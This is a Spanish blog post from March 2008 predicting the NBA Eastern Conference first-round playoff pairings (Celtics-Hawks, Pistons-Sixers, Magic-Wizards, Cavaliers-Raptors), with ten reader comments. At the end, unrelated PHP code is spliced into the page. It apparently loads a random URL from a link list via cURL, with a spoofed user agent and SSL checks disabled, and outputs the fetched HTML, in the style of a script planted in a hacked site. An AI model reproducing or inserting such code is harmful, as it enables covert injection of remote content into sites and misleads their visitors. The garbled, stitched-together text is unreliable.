Profetizando los Playoffs II: Conferencia Este

28 de March de 2008 por MagicJohnson32

24 horas atrás os ofrecimos la primera parte de nuestra previsión sobre los emparejamientos en los Playoffs de la NBA. El Mavs-Nuggets disputado anoche no hace más que darnos la razón y confirmar las respectivas tendencias que mantienen ambos equipos, ya sólo separados por un partido. Como Denver, los Warriors siguen al alza tras ganar a los Blazers y situarse a medio partido de Dallas. En el Este, tema que nos ocupa hoy, las cosas acostumbran estar más claras, aunque llegados a este punto se hace difícil intuir cuál será el orden definitivo de los equipos a partir del quinto puesto.

Veamos qué dice la bola de cristal: joshcelts

1. Boston Celtics vs 8. Atlanta Hawks. Sabemos desde noviembre que los Celtics serán el #1 del Este y de toda la NBA al finalizar la regular season. Más difícil era la apuesta por los Hawks, un equipo que no ha acabado de carburar como da la impresión de que podría hacerlo pero que sí ha mostrado recursos suficientes como para ser en años venideros un habitual en la postemporada. Los de Atlanta tienen un calendario más asequible que los Nets, con quienes están prácticamente empatados. Los Pacers y Chicago están a apenas 3 partidos pero cada vez que se les ve con opciones de entrar en la lucha, ellos solos se encargan de dimitir. Los Celtics han ganado dos veces a los Hawks esta temporada; el domingo 12 de abril, nuevo cara a cara. ¿Se convertirá Bibby en un factor decisivo? Con suerte a los Hawks les dará para ganar un partido, ya que no parecen en condiciones de poder con la asfixiante defensa que los Celtics han demostrado ser capaces de hacer cuando quieren. Y en Playoffs, querrán.

iguolayupdetroit2. Detroit Pistons vs 7. Philadelphia 76ers. En la lucha por los puestos del 5º al 7º, los Sixers tienen el calendario más complicado, con apenas un par de partidos teóricamente fáciles (contra Pacers y Bobcats). Son tal vez el equipo más en forma de la liga pero posiblemente se vean abocados a una primera ronda contra los Pistons, en lo que sería una reedición de todo un clásico de los Playoffs. Los tres Pistons-Sixers disputados esta temporada han sido partidos muy equilibrados, con un bañance de 2-1 favorable a los de Detroit pero con victoria a domicilio de los de Philadelphia hace apenas 15 días. Miércoles 9 de abril, último asalto en este combate de históricos antes de su posible emparejamiento en los Playoffs. No deberían de tener problemas los de Flip Saunders pero los de Cheeks llegan con más moral que nadie y sin complejos. Me sorprendería una barrida.

3. Orlando Magic vs 6. Washington Wizards. Los de la capital aún han de visitar cuatro de las canchas más complicadas de la liga y recibir a los Celtics, aunque tienen tres partidos casi ganados de antemano al recibir a Bucks,dwightcaron Heat y Pacers. Pero los Wizards han jugado bien todo el año, pese a las muchas e importantes bajas que han acumulado, y Eddie Jordan es un serio candidato al Coach of the Year. Los Magic han tenido una temporada muy cómoda y por momentos parecía que estaban en condiciones de competir por la segunda plaza de la Conferencia, gracias especialmente a la monumental campaña de Turkoglu. No ha sido así y desde hace muchas semanas su destino no es otro que ser terceros. El balance de sus enfrentamientos este año es de 2-1 para los Magic, con victoria de los Wizards y lección de Haywood a Dwight Howard hace una semana. El 16 de abril, cierre a la regular season de ambos equipos con un nuevo encuentro en Orlando. Los Magic son teóricos favoritos pero por lo visto los Wizards han fichado a un tal Gilbert Arenas para los Playoffs. Harían bien los Magic fichando al Rashard Lewis de Seattle y no al simulacro que hemos visto este año.

lebronrasho4. Cleveland Cavaliers vs 5. Toronto Raptors. Los recientes cambios en el quinteto de Sam Mitchell, sugeridos como ya sabéis por el propio Calderón, parecen haber frenado la caída libre en la que se hallaban los canadienses. Les espera un calendario muy fácil, con todos sus partidos contra equipos con balance negativo salvo la visita de los Hornets este próximo domingo, y deberían de ser capaces de superar a Wizards y Sixers en este tramo final. Esto les dejaría una primera ronda ante LeBron James y compañía. La previsión es sencilla: LeBron destrozará por completo a unos Raptors, que, sin recursos para frenar a King James, han de centrarse en evitar que el resto de los Cavs jueguen a buen nivel. Mike Brown cuenta con Wallace, Varejao, Joe Smith e Ilgauskas para intentar parar a Chris Bosh (ojo que Nesterovic está jugando muy bien y puede sacar provecho), aunque habrá que ver si Bosh no se defiende solo como en pasados Playoffs.

Comenta

10 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    Completamente de acuerdo en todo el análisis. Da una cierta lástima esta situación con respecto al infierno del oeste.
    La única eliminatoria que parece mínimamente equilibrada es la de Washington, pero es difícil pensar que Arenas va a poder llegar en forma habiéndose perdido toda la temporada. Particularmente Orlando es el equipo que más me ha gustado de los que he podido ver pero los veo poco experimentados y susceptibles de tropezar. (algo que no se consideraría sorpresa tampoco)
    El resto, parecen palizones de los favoritos… pero me resisto a pensar que no pueda haber alguna sorpresa importante. Al fin y al cabo los Hawks y los Sixers son jovenes gallitos y los Raptors han demostrado que son capaces de lo mejor y de lo peor (de esto más)
    Tiro una vacilada y digo que los Sixers se cargan a Detroit (todos sabemos que es mentira, pero bueno)

      Citar

  2. MagicJohnson32 dice:
    #2

    La cosa es que los Sixers están jugando muy muy bien. La defensa de Prince sobre Iguo puede ser determinante, pero yo no me acabo de fiar de los Pistons. Es un equipo con recursos de sobras para jugar muy bien y que a veces parece empeñado en jugar mal. Si Saunders da cuerda a los jóvenes, éstos aportan una frescura que los titulares no tienen.

    A mí un Magic-Wizards me parecería muy igualado, incluso con superioridad de Washington si Arenas llega en mínimas condiciones.

    Toronto es muy débil en defensa como para poder con los Cavs.

      Citar

  3. Jabho dice:
    #3

    Mala suerte para Toronto si acaba emparejado a los Cavs. Habrá que ver como acaban el año pero para mi Cleveland es el 2º mejor equipo del Este. Es muy limitado pero defiende bien y tiene a Lebron.

    De lo otro opino como vosotros que el tiempo de Detroit ha pasado y no confio en ellos. Tampoco en Orlando. sobvre Lewis espero que no haya ingresado en el club de trinca la pasta y echate a dormir

      Citar

  4. TheDeerHunter dice:
    #4

    Bueno, es cierto que precísamente de los “cabezas de serie” quien más difícil lo tiene a priori en primera ronda son los Magic.
    No obstante, si la logran pasar, todo el mundo los descarta como una opción sólida de dar guerra contra los otros teoricos 3 candidatos. En mi opinión son los que mejor juego han desplegado después de los celtics y tienen jugadores de garantías y con experiencia, además del pívot más fuerte de todos (que, por cierto, también se barajaba durante mucho tiempo su candidatura al MVP)
    Como equipo igual están un pelín verdes en play-offs (como alguno que otro, no se olvide) pero si pasan de la primera yo no veo que nadie se los pueda cargar fácil. (quizá Celtics, como mucho)
    Y, por cierto, yo sí me la juego y creo que Lewis lo hará bien en los playoffs (tampoco hay que olvidar que no tiene porqué alcanzar los números de Seattle en los que sólo estaban él y Allen)

      Citar

  5. Gallis dice:
    #5

    Yo es que no tengo tan claro que los PO´s queden así…veo a Toronto sextos, y cargándose a Orlando…y pese a que tampoco veo a Detroit campeones del este, solo les vería con problemas si tuvieran que enfrentarse, precisamente, a Toronto…

    Eso sí, si quedan así, el análisis está niquelado…

    Y esa semifinal de conferencia Celtics-Cavs me parece la final anticipada…

      Citar

  6. MagicJohnson32 dice:
    #6

    Por tendencias estoy de acuerdo en que Sixers y Wizards están mucho mejor, pero es que los calendarios de éstos dos últimos son mucho más complicados.

    Y el Celtics-Cavs puede ser la leche. A ver de qué es capaz LeBron y, sobre todo, a ver si los Cavs saben sacar provecho de su buena plantilla.

      Citar

  7. Viva_Dirk dice:
    #7

    ¿Que diferencia habeis encontrado entre el Lewis de Seattle y el de este año? No se si esperabais la misma anotación con Howard y cia que con la banda que tenía en Seattle.

    Yo cuando he visto a los Magics me ha parecido que estaba muy bien físicamente y siempre metido en el partido. Lo que pasa es que la sombra del temporadón de Turkoglu es alargada.

      Citar

  8. MagicJohnson32 dice:
    #8

    En Seattle se le vieron ciertas capacidades de liderazgo que aquí no han asomado mucho. Yo esperaba que aumentase sus porcentajes, que repartiese más asistencias y que fuese él la referencia exterior, y no Turkoglu. Aunque esto creo que se debe más a cuestiones técnicas. No sé, me ha parecido muy inconsistente. Entiendo que baje en anotación y rebotes pero es que no ha mejorado en nada. No es una temporada mala, eh, pero esperaba más.

      Citar

  9. Viva_Dirk dice:
    #9

    Es muy dificil ser la referencia exterior si juegas de 4. Yo creo que los Magics están bastante contentos con el, a ver si fichan algo para acompañar a Howard en la pintura y dejan a Lewis de 3 y Turkoglu de 2.

      Citar

  10. MagicJohnson32 dice:
    #10

    Por eso digo que creo que se debe a cuestiones técnicas. Aunque bueno, lo de que ha jugado de 4 se puede tomar como explicación sólo hasta cierto punto, porque Rashard ha jugado todo el año en la línea de 3. Lleva ya tirados más triples que en cualquier otra temporada, algo que es en parte lógico dado que las defensas se cierran sobre Dwight. Pero le he visto poco penetrando y un tío con su físico ha de aprovecharlo más.

    En la pintura tenían a Battie, jeje.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>